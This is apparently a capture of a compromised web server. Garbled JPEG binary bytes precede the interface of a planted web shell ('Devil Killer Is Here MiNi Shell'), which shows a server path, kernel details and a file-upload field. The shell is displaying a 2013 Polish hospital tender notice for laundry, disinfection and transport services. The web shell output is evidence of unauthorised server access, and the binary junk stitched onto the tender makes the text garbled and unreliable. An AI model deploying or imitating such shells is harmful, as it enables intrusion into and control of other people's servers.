JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130603/212300-N-2013.html

<p class="kh_header"><b>Bytom: Świadczenie usług pralniczych i dezynfekcji wraz z czyszczeniem chemicznym oraz transportem</b><br>
<b>Numer ogłoszenia: 212300 - 2013; data zamieszczenia: 03.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 1 , ul. Żeromskiego 7, 41-902 Bytom, woj. śląskie, tel. 032 3963266, 3863332, faks 032 2816765.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital1.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pralniczych i dezynfekcji wraz z czyszczeniem chemicznym oraz transportem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług pralniczych i dezynfekcji wraz z czyszczeniem chemicznym oraz transportem bielizny szpitalnej: 1)W zakres świadczonych usług pralniczych wchodzi: pranie wodne bielizny szpitalnej, operacyjnej, materacy, koców, poduszek, oraz odzieży ochronnej i operacyjnej (fartuchy operacyjne, bluzy operacyjne, spodnie operacyjne, koszule operacyjne, sukienki operacyjne, serwety operacyjne) i innych (poduszki z pierza, poduszki-gąbka, pokrowce na materac, pokrowce na fotele, ręczniki frotte, ścierki, worki na bieliznę, szlafroki, zasłony, firany, obrusy, serwetki ozdobne, parawany, bieżniki, jaśki - powłoczki, trykotki, kołdry, mopy, żaluzje pionowe); dezynfekcja chemiczno-termiczna; prasowanie; maglowanie, suszenie w suszarkach bębnowych i naprawy krawieckie oraz czyszczenie chemiczne asortymentu nie nadającego się do prania wodnego wraz z transportem. 2)Wykonawca musi dysponować pralnią dopuszczoną przez właściwego miejscowo Powiatowego Państwowego Inspektora Sanitarnego do świadczenia usług pralniczych dla jednostek służby zdrowia, spełniającą wymagania ustawy z dnia 5.12.2008 r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi (Dz. U. nr 234 z 2008 r. poz. 1570 z poz. zm.), Rozporządzenia Ministra Gospodarki z dnia 27.04.2000 r. w sprawie bezpieczeństwa i higieny pracy w pralniach i farbiarniach (Dz. U. nr 40 z 2000 r. poz. 469), Rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 26.09.1997 r. w sprawie ogólnych przepisów BHP (Dz. U. nr 169 z 2003 r. poz. 1650), posiadającą pełną barierę higieniczną oraz automatyczny system dozowania środków piorąco-dezynfekujących.3)Pralnia musi być wyposażona w pralnicę tunelową, celem zmniejszenia ryzyka zniszczenia bielizny w trakcie prania (tarcie) oraz wyładunku. Wykonawca musi udokumentować, że dysponuje pralnią w całym czasie realizacji umowy, tj. będzie   w stanie zrealizować zamówienie zgodnie z SIWZ oraz ww. przepisami. W przypadku pralni dzierżawionej, wynajmowanej, będącej w użyczeniu itp., Wykonawca obowiązany jest podać w ofercie miejsce realizacji usługi oraz podstawę prawną do dysponowania pralnią wraz z czasookresem zawarcia umowy oraz podaniem strony, z którą Wykonawca zawarł umowę. Należy przedstawić opis maszyn i urządzeń, w niej się znajdujących, które będą potwierdzać wymogi niniejszego rozdziału oraz możliwości zrealizowania przedmiotu zamówienia zgodnie z SIWZ i zał. do SIWZ. Dotyczy to również pralni będących własnością Wykonawcy ubiegającego się  o zamówienia publiczne, z wyjątkiem części dotyczącej najmu, dzierżawy, umowy użyczenia). Wykonawca winien udowodnić skuteczność i zgodność technologii prania i dezynfekcji stosowanej w pralni, w której Wykonawca będzie realizować zamówienie z ww. przepisami oraz niniejszą SIWZ. W tym celu należy przedstawić technologię wodnego prania i dezynfekcji bielizny szpitalnej, w tym moduły prania i dezynfekcji bielizny oraz technologię czyszczenia chemicznego asortymentu nie nadającego się do prania wodnego.4)Pralnia wykonawcy musi posiadać wdrożony system zarządzania jakością  ISO 9001 co najmniej w zakresie  usługowego prania wraz z dezynfekcją i transportem dla służby zdrowia. Certyfikat potwierdzający wdrożenie powyższego systemu należy dołączyć do oferty.
5)Usługi muszą być wykonywane zgodnie z wymogami obowiązującymi w służbie zdrowia ze szczególnym uwzględnieniem zaleceń dotyczących szpitali oraz wymogami niniejszej SIWZ. 6)Stosowane środki do dezynfekcji w procesie prania wodnego winny posiadać wpis do Rejestru Wyrobów Medycznych, Produktów Biobójczych lub inny dokument potwierdzający dopuszczenie do obrotu na terenie Polski lub Unii europejskiej oraz deklarację zgodności CE. Środki dezynfekujące do prania wodnego powinny działać w zakresie V, F, B, Tbc i spory w tym na clostridium difficile. Należy dołączyć do oferty karty charakterystyki stosowanych środków.7)Czyszczenie chemiczne winno się odbywać z zastosowaniem środków posiadających certyfikat dermatologiczny. Certyfikat należy dołączyć do oferty,8)Odbieranie bielizny brudnej i dostarczanie bielizny czystej odbywać się będzie od poniedziałku do piątku. W przypadku zaistnienia konieczności świadczenia ww. usługi w soboty i inne dni wolne od pracy szczegółowy jej zakres będzie uzgadniany z 7 dniowym wyprzedzeniem. 9)Usługi mają być świadczone do 24 godzin od chwili przekazania asortymentu pralniczego, za wyjątkiem odzieży fasonowej, która musi wracać do Zamawiającego do 48 godzin od chwili przekazania oraz materacy, kocy i poduszek, które mają wracać do Zamawiającego do 72 godzin od chwili przekazania. 10)Bielizna czysta będzie dostarczana w godz. 10-14 środkiem transportu Wykonawcy, Magazyn bielizny znajduje się w szpitalu przy ul. Żeromskiego 7 oraz Szpitalu Zakaźny  Al. Legionów 49.11)Bielizna brudna będzie odbierana w godz. 10-14 środkiem transportu Wykonawcy, Magazyn bielizny znajduje się w szpitalu przy ul. Żeromskiego 7 oraz Szpitalu Zakaźny Al. Legionów 49. 12)Bielizna czysta i brudna z Przychodni Chorób Płuc i Gruźlicy przy ul. K. Miarki 10, z Poradni na ul. Parkowej 1 oraz Bytomskiego Centrum Rehabilitacji Dzieci i  Młodzieży Niepełnosprawnej Ruchowo na ul. Strzelców Bytomskich  będzie dostarczana  i odbierana w godz. 10-14 środkiem transportu Wykonawcy raz na dwa tygodnie. 13)Środki transportu brudnej i czystej bielizny winny być oddzielne lub posiadać szczelną i podzieloną komorę załadunkową tak, aby bielizna czysta nie miała możliwości jakiegokolwiek kontaktu z bielizną brudną
14)Osoba dostarczająca bieliznę obowiązana jest posiadać prawidłowy ubiór - fartuch ochronny i rękawice ochronne,15)Bielizna czysta przywożona z pralni musi być poskładana i zapakowana asortymentowo w folie jednorazowego użytku, a odzież ochronna na wieszakach także w workach foliowych. Folia musi być przeznaczona do pakowania bielizny szpitalnej  i posiadać atest PZH, który to potwierdza. Atest ten należy dołączyć do oferty, 16)Transport bielizny czystej do Zamawiającego i brudnej do pralni ma się odbywać na wózkach jezdnych zamykanych, dostarczonych na czas trwania umowy przez Wykonawcę w ilości wynikającej z wielkości dostaw.
17)Ubrania i fartuchy operacyjne mają być podawane procesowi obróbki w pozycji wiszącej przez urządzenie umożliwiające ich odpylenie i automatyczne składanie.
18)Bielizna nie nadająca się do dalszego użytkowania bądź do naprawy winna być zapakowana w oddzielnym worku z opisem kasacja lub naprawa 19)Wykonawca odpowiada za bieliznę Zamawiającego od momentu odebrania jej   z magazynu bielizny brudnej, do czasu przekazania czystej bielizny do magazynu Zamawiającego
20)Wykonawca usługi zobowiązany jest do potwierdzenia odbioru na kwicie zbiorczym wykazującym asortymentowe ilości oddanej bielizny oraz określające jej wagę ogólną, w/w kwit potwierdza własnoręcznym podpisem pracownik szpitala oraz odbiorca.
21)Wykonawca poza kompleksową usługą prania, zobowiązany jest do wykonania drobnych napraw bielizny takich jak: przyszywanie guzików, naprawa zamków, napów, troczków, zszywanie rozdarć, po oddzielnym zapakowaniu przez Zamawiającego i odesłaniu do pralni. 22)Bielizna oddana do prania będzie trwale oznaczona przez Zamawiającego. 23)Zamawiającemu przysługuje prawo do reklamacji w przypadku nieprawidłowego wykonania usługi (nieodpłatnie).
24)Wykonawca raz na kwartał ma obowiązek dostarczyć Zamawiającemu (Pielęgniarce Epidemiologicznej) na swój koszt, kopie badań mikrobiologicznych wykonanych w pralni Wykonawcy potwierdzonych przez Stację Sanitarno - Epidemiologiczną, dokumentujących skuteczność prania i dezynfekcji. Zamawiający ponadto zastrzega sobie prawo wykonania własnych wymazów czystościowych w chwili dostarczenia bielizny do magazynu Zamawiającego w obecności pracownika Wykonawcy na koszt Wykonawcy. 25)Płukanie odzieży fasonowej będzie odbywało się przy użyciu płynu antystatycznego. 26)W ostatnim etapie procesu płukania Wykonawca winien zagwarantować pomiar i stabilizacje pH, pranej pościeli, - aby zminimalizować ryzyko powstawania odleżyn. .
27)Wymagane jest stosowanie oddzielnych cykli prania bielizny pochodzących z oddziałów szpitalnych i sal operacyjnych,
28)Asortyment nie nadający się do prania wodnego winien być czyszczony chemiczne, po oddzielnym zapakowaniu przez Zamawiającego i przekazaniu na osobnym kwicie Wykonawcy.
29)Wykonawca winien dysponować zewnętrznym, zintegrowany w strefie płukania system filtracji do usuwania włosów, pyłu bawełnianego oraz połamanych włókien celu zwiększenia bezpieczeństwa epidemiologicznego.
30)Wykonawca winien dysponować urządzeniem do czyszczenia chemicznego.
31)Wykonawca winien dysponować urządzeniem do obróbki fartuchów i ubrań operacyjnych w pozycji wiszącej - za pomocą gorącego powietrza, umożliwiającym ich odpylenie i zapewniające automatyczne składanie.
Przed zawarciem umowy Zamawiający ma prawo weryfikacji informacji podanych w ofercie poprzez wizytę w pralni Wykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.10.00-6, 98.31.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do specyfikacji);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej dwie usługi, polegające na świadczeniu usług pralniczych i dezynfekcji wraz z czyszczeniem chemicznym oraz transportem dla jednostki służby zdrowia o wartości nie mniejszej niż 280 000,00 zł każda z załączeniem dokumentu potwierdzającego, ze usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać, że:
a)dysponuje  pralnią dopuszczoną przez właściwego miejscowo Państwowego Inspektora Sanitarnego do świadczenia usług pralniczych dla jednostek służby zdrowia, spełniającą wymagania ustawy z dnia 5.12.2008 r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi (Dz. U. nr 234 z 2008 r. poz. 157 z późn. zm.), Rozporządzenia Ministra Gospodarki z dnia 27.04.2000 r.   w sprawie bezpieczeństwa i higieny pracy w pralniach i farbiarniach (Dz. U. nr 40 z 2000 r. poz. 469), Rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 26.09.1997 r.  w sprawie ogólnych przepisów BHP (Dz. U. nr 169 z 2003 r. poz. 1650), posiadającą pełną barierę higieniczną oraz automatyczny system dozowania środków piorąco-dezynfekujących.
Pralnia musi być wyposażona w pralnicę tunelową, celem zmniejszenia ryzyka zniszczenia bielizny w trakcie prania (tarcie) oraz wyładunku. Wykonawca musi udokumentować, że dysponuje pralnią w całym czasie realizacji umowy, tj. będzie  w stanie zrealizować zamówienie zgodnie z SIWZ oraz ww. przepisami. W przypadku pralni dzierżawionej, wynajmowanej, będącej w użyczeniu itp., Wykonawca obowiązany jest podać w ofercie miejsce realizacji usługi oraz podstawę prawną do dysponowania pralnią wraz z czasookresem zawarcia umowy oraz podaniem strony, z którą Wykonawca zawarł umowę. Należy przedstawić opis maszyn i urządzeń, w niej się znajdujących, które będą potwierdzać wymogi niniejszego rozdziału oraz możliwości zrealizowania przedmiotu zamówienia zgodnie z SIWZ i zał. do SIWZ. Dotyczy to również pralni będących własnością Wykonawcy ubiegającego się o zamówienia publiczne, z wyjątkiem części dotyczącej najmu, dzierżawy, umowy użyczenia).
Wykonawca winien udowodnić skuteczność i zgodność technologii prania i dezynfekcji stosowanej w pralni, w której Wykonawca będzie realizować zamówienie z ww. przepisami oraz niniejszą SIWZ. 
b)dysponuje środkami transportu przeznaczonymi do realizacji zamówienia , które są dostosowane do przewozu bielizny szpitalnej, odpowiednio pozytywnie opiniowane przez Państwową Stację Sanitarno - Epidemiologiczną (wymaga się dysponowania min. 2 samochodami), z czego co najmniej jeden posiadać będzie podział na strefę czystą i brudną, tak aby asortyment czysty nie miał możliwości stykania się z asortymentem tzw. skażonym.
c)dysponuje min. 4 wózkami zamykanymi, którymi odbywa się wyładunek bielizny z samochodu do pralni oraz załadunek z pralni do samochodu. 
d)dysponuje automatycznym urządzeniem do dezynfekcji pojemników i wózków.
e)dysponuje zewnętrznym, zintegrowany w strefie płukania system filtracji do usuwania włosów, pyłu bawełnianego oraz połamanych włókien celu zwiększenia bezpieczeństwa epidemiologicznego.
f)dysponuje urządzeniem do czyszczenia chemicznego. 
g)dysponuje automatycznym urządzeniem do prasowania i odpylania ubrań operacyjnych, automatyczną składarką do fartuchów operacyjnych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do specyfikacji);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać, ze poosiada polisę ubezpieczeniową OC w zakresie prowadzonej działalności gospodarczej o wartości min. 1.000.000 zł, z klauzula o odpowiedzialności w zakresie przenoszenia chorób zakaźnych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-dokument prawa własności lokalu, w którym będzie realizowane zamówienie, lub aktualną umowę najmu lokal (okres najmu lokalu nie może być krótszy niż okres, na który ma być zawarta umowa w sprawie zamówienia publicznego).
-technologie wodnego prania i dezynfekcji bielizny szpitalnej, w tym moduły prania i dezynfekcji oraz technologię czyszczenia chemicznego  jakie Wykonawca będzie stosował do realizacji przedmiotu zamówienia.
-wykaz wszystkich środków, jakich wykonawca zamierza używać do wykonania zamówienia, wpis do Rejestru Wyrobów Medycznych, Produktów Biobójczych lub inny dokument potwierdzający dopuszczenie do obrotu na terenie Polski lub Unii Europejskiej oraz deklarację zgodności CE dla środków dezynfekcyjnych do prania wodnego, certyfikat dermatologiczny środka piorącego do czyszczenia chemicznego oraz karty charakterystyk wszystkich środków, jakie będą używane do realizacji zamówienia - załącznik nr 6  do siwa,
-Pozytywną opinie sanitarną wydaną przez właściwego Państwowego Powiatowego Inspektora Sanitarnego dotycząca środków transportu wystawioną w oparciu o Ustawę o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi z dnia 05 grudnia 2008r.
-Pozytywną opinie sanitarną wydaną przez właściwego Państwowego Powiatowego Inspektora Sanitarnego w oparciu o przeprowadzone kontrole, potwierdzającą  dopuszczenie pralni wykonawcy do świadczenia usług pralniczych dla jednostek służby zdrowia, spełniającą wymagania ustawy z dnia 5.12.2008 r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi (Dz. U. nr 234 z 2008 r. poz. 1570 z późn. zm.), Rozporządzenia Ministra Gospodarki z dnia 27.04.2000 r.  w sprawie bezpieczeństwa i higieny pracy  w pralniach i farbiarniach (Dz. U. nr 40 z 2000 r. poz. 469), Rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 26.09.1997 r. w sprawie ogólnych przepisów BHP (Dz. U. nr 169 z 2003 r. poz. 1650),  oraz potwierdzająca, że pralnia posiada pełną barierę higieniczną, 
- Atest PZH potwierdzający przeznaczenie folii do pakowania bielizny szpitalnej,
-Certyfikat systemu zarządzania jakością ISO 9001.
- Badania mikrobiologiczne potwierdzające skuteczność procesu dezynfekcji wózków do transportu bielizny - minimum dwa badania potwierdzone przez właściwą Stację Sanitarno -Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji i wpisanego na jego listę laboratoriów badawczych. Oferenci mający siedzibę poza terenem polski muszą dołączyć badania innego uprawniony podmiotu, stosownego dla kraju, w którym ma siedzibę Wykonawca- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
- Badania mikrobiologiczne wykonane w pralni Wykonawcy celem potwierdzenia skuteczności dezynfekcji zgodnie z wymogami siwz - minimum cztery badania potwierdzone przez właściwą Stację Sanitarno -Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji i wpisanego na jego listę laboratoriów badawczych. Oferenci mający siedzibę poza terenem polski muszą dołączyć badania innego uprawniony podmiotu, stosownego dla kraju, w którym ma siedzibę Wykonawca - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
